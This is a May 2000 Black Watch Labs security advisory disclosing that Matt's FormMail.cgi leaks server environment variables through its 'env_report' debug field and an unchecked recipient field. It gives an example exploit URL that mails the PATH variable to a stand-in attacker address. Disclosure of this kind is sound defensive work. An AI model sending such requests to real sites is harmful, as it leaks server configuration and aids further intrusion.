Black Watch Labs ID: BWL-00-06
   
   Environment and Setup Variables can be Viewed through FormMail Script
   Black Watch Labs Security Advisory #00-06 (May 10, 2000)
   
   Name: 
   Environment and Setup Variables can be Viewed through FormMail Script
   Black Watch Labs ID: 
   BWL-00-06
   Date Released: 
   May 10, 2000
   Category: 
   Application (HTML): modification of parameters, debug options.
   Products affected:
   Matt's FormMail.cgi
   Number of affected sites/pages/users:
   It is estimated that there are thousands of pages containing links to the formmail script.
   Summary: 
   The script allows several environment variables to be viewed by the attacker, who can gain useful information on the
   site, making further attacks more feasible.
   Analysis:
   FormMail contains a debug field named "env_report", whose value is a list of environment variables (accessed via
   $ENV[name]) separated by commas. These variables (if they exist) are embedded into the message body. Furthermore, the
   script does not check the integrity of the recipient, thus the recipient field can be changed, so the message will be
   sent to the attacker's account. Thus the attacker can gain the environment information.
   Exploits: 
   FormMail: assume the URL for the script is http://www.formmail.site/cgi-bin/formmail.cgi, then to get the PATH
   environment parameter (i.e. to send it to account: attacker@attacker.site), all there is to do is to request the
   following URL: 
   http://www.formmail.site/cgibin/formmail.cgi?env_report=PATH&recipient=
   attacker@attacker.site&required=&firstname=&lastname=&email=&message=&
   Submit=Submit
   Vendor Patch or workaround: 
   No patch or workaround available at the time of this release.
   
   References and Links: 
   Matt's Script Archive (FormMail): http://www.worldwidemart.com/scripts/formmail.shtml
   About Black Watch Labs (www.perfectotech.com/blackwatchlabs/)
   Black Watch Labs is a research group operated by Perfecto Technologies Inc., the leader in Web Application Security
   Management. Black Watch Labs was established in order to further the knowledge of the Internet community in the arena
   of Web application security management. Black Watch Labs publishes security advisories regularly, which are maintained
   at http://www.perfectotech.com/blackwatchlabs/, and are also posted to relevant security lists and Web sites. Black
   Watch Labs also operates a Web application security mailing list, which can be subscribed to at
   http://www.perfectotech.com/blackwatchlabs/. For more info about Black Watch Labs and Web Application Security
   Management, please call (408) 855-9500 or email BlackWatchLabs@perfectotech.com.
   
   About Perfecto Technologies (http://www.perfectotech.com/)
   Founded in 1997 and headquartered in Santa Clara, Calif., Perfecto Technologies is the leader in Web Application
   Security Management software. AppShield(TM), Perfecto's flagship product, is the first to provide automatic Web site
   security, enabling companies to realize faster time to market while meeting the demand for privacy and security. Black
   Watch Labs was established to further the knowledge of Web application security within the Internet security
   community. Privately held, Perfecto is funded by blue-chip venture capital firms and industry leaders, including
   Goldman Sachs, Intel Corporation, Sequoia Capital, The Sprout Group and Walden Israel. More information about Perfecto
   Technologies may be obtained by visiting the Company's Web site at www.perfectotech.com or by calling the Company
   directly at (408) 855-9500.
   Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved.
   Permission is hereby granted to reproduce and distribute the application security alerts herein in their entirety,
   provided the information, this notice and all other Perfecto Technologies marks remain intact.
   Specific Limitations on Use of the Black Watch Labs Advisories
   THIS ADVISORY INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN SECURITY RISKS AND ISSUES ASSOCIATED WITH SITES ON
   THE INTERNET, INCLUDING, POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS ADVISORY IS SOLELY FOR THE
   PURPOSES OF UNDERSTANDING THESE RISKS AND ISSUES WITH RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED BY
   PERFECTO TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED TO YOU FOR ANY IMPROPER OR ILLEGAL PURPOSE,
   INCLUDING TO VIOLATE THE SECURITY OF ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE USE FOR ANY IMPROPER
   PURPOSE OF INFORMATION DISCLOSED TO YOU COULD SUBJECT YOU TO CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND
   OTHER COUNTRIES.
   NO WARRANTY
   Any material furnished by Perfecto Technologies is furnished on an "as is" basis and may change without notice.
   Perfecto Technologies makes no warranties of any kind, either expressed or implied as to any matter including but not
   limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use
   of the material. Neither does Perfecto Technologies make any warranty of any kind with respect to freedom from patent,
   trademark or copyright infringement. In no event shall Perfecto Technologies be liable for any damages whatsoever
   arising out of or in connection with the use or spread of this information. Any use of this information is at the
   user's own risk.